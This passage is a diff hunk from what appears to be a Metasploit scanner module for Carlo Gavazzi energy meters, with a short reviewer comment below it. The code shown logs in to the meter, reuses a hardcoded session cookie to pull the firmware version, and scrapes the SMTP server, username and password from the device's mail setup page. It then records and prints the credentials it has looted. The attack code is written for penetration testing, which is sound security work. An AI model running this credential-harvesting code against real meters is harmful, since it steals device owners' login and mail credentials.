modules/auxiliary/scanner/http/gavazzi_em_login_loot.rb

```diff
@@ -0,0 +1,260 @@
+      print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+
+      # Extract firmware version
+      begin
+        res = send_request_cgi(
+          {
+            'uri' => '/setupfirmware.php',
+            'method' => 'GET',
+            'headers' => {
+              'Cookie' => 'PHPSESSID=xxe32qk2gbkfn3ur2nm7ypmgyp'
+            }
+          }
+        )
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        return :abort
+      end
+
+      if (res && res.code == 200 && res.body.include?('Firmware Version'))
+        fw_ver_dirty = res.body.match(/Firmware Version(.*)(.*)td/)
+        fw_ver_clean = "#{fw_ver_dirty}".match(/Ver. (.*)[$<]/)[1]
+        vprint_status("#{rhost}:#{rport} - Firmware version #{fw_ver_clean}...")
+
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: "Carlo Gavazzi Energy Meter [Firmware ver #{fw_ver_clean}]",
+          user: user,
+          password: pass
+        )
+      end
+
+      if (res && res.code == 200 && res.body.include?('Versione Firmware Installata'))
+        fw_ver_dirty = res.body.match(/Ver. (.*)[$<]/)
+        fw_ver_clean = "#{fw_ver_dirty}".match(/[^Ver. ](.*)[^<]/)
+        vprint_status("#{rhost}:#{rport} - Firmware version #{fw_ver_clean}...")
+
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: "Carlo Gavazzi Energy Meter [Firmware ver #{fw_ver_clean}]",
+          user: user,
+          password: pass
+        )
+      end
+
+      #
+      # Extract SMTP password
+      #
+
+      begin
+        res = send_request_cgi(
+          {
+            'uri'       => '/setupmail.php',
+            'method'    => 'GET',
+            'headers'   => {
+              'Cookie' => 'PHPSESSID=xxe32qk2gbkfn3ur2nm7ypmgyp'
+            }
+          }
+        )
+
+      rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
+        vprint_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+        return :abort
+      end
+
+      if (res && res.code == 200 && res.body.include?('SMTP'))
+        dirty_smtp_server = res.body.match(/smtp" value=(.*)[$=]/)[1]
+        smtp_server = dirty_smtp_server.match(/[$"](.*)[$"]/)
+        dirty_smtp_user = res.body.match(/usersmtp" value=(.*)[$=]/)[1]
+        smtp_user = dirty_smtp_user.match(/[$"](.*)[$"]/)
+        dirty_smtp_pass = res.body.match(/passwordsmtp" value=(.*)[$=]/)[1]
+        smtp_pass = dirty_smtp_pass.match(/[$"](.*)[$"]/)
+        print_good("#{rhost}:#{rport} - SMTP server #{smtp_server}, SMTP username #{smtp_user}, SMTP password #{smtp_pass}")
+      else
+        print_error("#{rhost}:#{rport} - SMTP password not retrieved. Check if the user has 'admin' privileges")
```

Comment:
@h00die The user needs to have administrative privs in order to access smtp config. Updated the module to make the message clear.